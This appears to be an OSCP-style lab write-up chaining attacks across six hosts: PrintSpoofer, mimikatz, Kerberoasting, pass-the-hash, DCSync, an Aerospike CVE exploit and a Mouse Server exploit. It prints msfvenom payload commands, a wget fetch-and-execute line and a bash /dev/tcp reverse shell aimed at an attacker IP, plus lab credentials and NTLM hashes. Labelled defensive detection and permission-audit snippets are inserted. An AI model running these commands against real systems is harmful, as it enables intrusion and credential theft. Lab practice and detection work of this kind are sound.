OSCP A

Network

Given:

  • 192.168.188.141 MS01 (Windows)
  • 192.168.188.143 Aero
  • 192.168.188.144 Crystal
  • 192.168.188.145 Hermes

Found:

  • 10.10.148.140 DC01
  • 10.10.148.142 MS02

Creds

eric.wallows:EricLikesRunning800 (given creds for 192.168.155.141)
web_svc:Diamond1 (Kerberoasted user)

Other users:
tom.admin
sql_svc

Network Enumeration

192.168.188.141 / MS01

Enumeration

Testing the given credentials shows that the domain is oscp.exam and the host is MS01.

Initial Access

We can access the machine via SSH.

ssh eric.wallows@192.168.201.141

Let's start enumerating permissions, subnets, and users.

We have an interface on 10.10.161.141 and SeImpersonatePrivilege. We also have the full list of domain users, so we create a users.txt file.

We transfer adPEAS and winPEAS to the target.

Import the adPEAS module and execute it.

Found the DC on 10.10.161.140.

We find tom_admin, who has DCSync rights on the domain, and two Kerberoastable users: sql_svc and web_svc.

Privilege Escalation

The user has SeImpersonatePrivilege, so we'll perform a PrintSpoofer attack. Transfer the exploit and execute it.

Post Exploitation

Transfer mimikatz.exe to the machine and execute it as administrator.

sekurlsa::logonpasswords

celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd
mary.williams:9a3121977ee93af56ebd0ef4f527a35e

We try cracking these NTLM hashes with hashcat.

No results. Let's try another route: Kerberoasting.

Transfer chisel.exe to the target and create a SOCKS tunnel.

Now perform a Kerberoasting attack with proxychains pointing to the DC.

Using hashcat, we cracked the password:

web_svc:Diamond1

Now perform a ping sweep to find x.x.x.41 and x.x.x.42.

10.10.148.142 / MS02

Enumeration

Initial Access

Using Celia Almeda's NTLM hash, we log in over WinRM with pass-the-hash.

In C:\, we find windows.old, so we take the SAM and SYSTEM hives from it, download them with evil-winrm, and run secretsdump locally.

Pass-the-hash (PTH) to DC01.

10.10.148.140 / DC01

Initial Access

Using the hash found on MS02 (.142), we log in with evil-winrm.

Privilege Escalation

tom_admin can DCSync the DC, so:
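From the defender's side, an added example that is not part of this writeup: two rules over constructed Windows Security events that would have flagged the Kerberoasting of web_svc and sql_svc (event 4769 with RC4 ticket encryption for a user-account SPN) and tom_admin's DCSync (event 4662 exercising the replication control-access rights). The Event class, the field names and the sample data are a reduced construction of mine, not a real log format.

```python
from dataclasses import dataclass, field

# Control-access right GUIDs that replication (and therefore DCSync) requires.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

@dataclass
class Event:
    """Reduced Windows Security event: id, requesting account, selected fields (constructed)."""
    event_id: int
    account: str
    props: dict = field(default_factory=dict)

def is_kerberoast(ev):
    """4769 TGS request using RC4 (0x17) for a user-account SPN, not a machine account or krbtgt."""
    if ev.event_id != 4769:
        return False
    svc = ev.props.get("ServiceName", "")
    return (ev.props.get("TicketEncryptionType") == "0x17"
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def is_dcsync(ev, dc_accounts):
    """4662 with replication rights exercised by an account that is not a domain controller."""
    if ev.event_id != 4662:
        return False
    rights = ev.props.get("Properties", "")
    return ((DS_REPL_GET_CHANGES in rights or DS_REPL_GET_CHANGES_ALL in rights)
            and ev.account not in dc_accounts)

def triage(events, dc_accounts):
    """Return (rule, account, target) tuples for every event a rule matches."""
    alerts = []
    for ev in events:
        if is_kerberoast(ev):
            alerts.append(("kerberoast", ev.account, ev.props["ServiceName"]))
        elif is_dcsync(ev, dc_accounts):
            alerts.append(("dcsync", ev.account, ev.props.get("ObjectName", "")))
    return alerts

# Constructed sample events mirroring the writeup's scenario (not real log data).
SAMPLE = [
    Event(4769, "eric.wallows", {"ServiceName": "web_svc", "TicketEncryptionType": "0x17"}),
    Event(4769, "eric.wallows", {"ServiceName": "sql_svc", "TicketEncryptionType": "0x17"}),
    Event(4769, "mary.williams", {"ServiceName": "MS02$", "TicketEncryptionType": "0x12"}),
    Event(4662, "DC01$", {"Properties": DS_REPL_GET_CHANGES_ALL, "ObjectName": "DC=oscp,DC=exam"}),
    Event(4662, "tom_admin", {"Properties": DS_REPL_GET_CHANGES_ALL, "ObjectName": "DC=oscp,DC=exam"}),
]

DC_ACCOUNTS = {"DC01$"}  # machine accounts that legitimately replicate
```

Running triage(SAMPLE, DC_ACCOUNTS) yields the two RC4 service-ticket requests and the replication by tom_admin, while the AES request for MS02$ and DC01$'s own replication stay silent.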

Post Exploitation

Using the hash:

192.168.188.143 / AERO

Enumeration

The web server on port 80 is the default Apache2 page with nothing more.
The one at 81 is the default Nginx Fedora page.

The machine is called Aero, so I searched for Aero and port 3000 and found Aerospike, which is a NoSQL database.
The script in searchsploit is broken, so I searched for the vulnerability online and found https://github.com/b4ny4n/CVE-2020-13151.

Initial Access

The correct script is the one at https://www.exploit-db.com/exploits/49067 with the Lua script in the GitHub repo. We have to change the version in the script before executing it.

Once changed, start a listener on port 80 and an HTTP server on port 443 serving a reverse shell.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.229 LPORT=80 -f elf -o reverse
python cve2020-13151.py --ahost 192.168.155.143 --cmd 'wget http://192.168.45.229:443/reverse -O /tmp/reverse && chmod +x /tmp/reverse && /tmp/reverse &'

Get the proof in Aero's home directory.

Privilege Escalation

Checking the SUID programs, we find screen-4.5.0.

But I couldn't get it to work, so I transferred and launched pspy and found a file being executed periodically: /usr/bin/asinfo. I replaced its content with bash -i >& /dev/tcp/192.168.45.229/443 0>&1, started a listener, and waited.

echo 'bash -i >& /dev/tcp/192.168.45.229/443 0>&1' > /usr/bin/asinfo
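Added hardening check, not part of the writeup: the root cause above is a program that root runs periodically and that a low-privileged user can overwrite. This Python audit reports why such a target is hijackable; it works on a constructed temp-dir copy of the situation (the writeup does not show asinfo's mode, so the fixture assumes a world-writable file beside a correctly permissioned one).

```python
import os
import stat
import tempfile

def weak_permissions(path, trusted_uids=frozenset({0})):
    """List the reasons a file run by a privileged scheduled job could be replaced by others."""
    reasons = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        reasons.append("symlink")  # whoever controls the link controls what runs
        st = os.stat(path)
    if st.st_uid not in trusted_uids:
        reasons.append("owner uid %d is not trusted" % st.st_uid)
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit")  # file can be swapped
    return reasons

def audit_fixture():
    """Construct the writeup's situation in a temp dir and audit both files.

    'asinfo' is created mode 777 (assumed state of the hijacked file); 'asinfo-fixed' is 755.
    """
    d = tempfile.mkdtemp()  # mode 700, so the parent-directory check is satisfied
    modes = {"asinfo": 0o777, "asinfo-fixed": 0o755}
    results = {}
    for name, mode in modes.items():
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho ok\n")
        os.chmod(p, mode)
        # The fixture files are owned by the current user, so trust that uid instead of root.
        results[name] = weak_permissions(p, {os.getuid()})
    return results
```

On a real host the same check would be run with the default trusted uid (root) against every path that cron, systemd timers or a service's own scheduler executes.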

Post Exploitation

192.168.188.144 / CRYSTAL

Enumeration

Using Nikto, we find a .git folder.

Initial Access

With git-dumper, we can retrieve all files.

We got the project.

In the configuration:

If we examine the git history, we can recover an earlier version of the database configuration:

So dean@challenge.pwk:BreakingBad92.

Another update gives us another user:

stuart@challenge:BreakingBad92.

Testing the FTP service, we retrieve the local flag.

Using the same user with SSH:

Privilege Escalation

In /opt/backups there is a backup of the web application. We transfer it to the attack host, run zip2john, and crack the archive password with hashcat: codeblue.

We then extract the zip with 7z x and find in the config file:

Database credentials, but there is no database running.

So we try to pivot to Chloe with the secret, and:

Post Exploitation

Chloe is an admin, so we pivot to root and retrieve the flag.

192.168.188.145 / HERMES

Enumeration

The web page has nothing, but we can enumerate a user, Samuel Haynes, who could be s.haynes or samuel.haynes.

Scanning UDP, we find port 161.

Using snmpwalk, we first retrieve the users, then the running applications.

Initial Access

We see Mouse Server 1.7.8.5, so:

We create an msfvenom reverse shell, a Python server to serve it, and an nc listener on port 80.

python 50972.py 192.168.188.145 192.168.45.229:443 reverse.exe

Privilege Escalation

Get the local flag.

Transfer winPEAS, and:

RDP to the machine:

xfreerdp3 /u:zachary /p:'Th3R@tC@tch3r' /v:192.168.188.145

The proof is on the admin's desktop.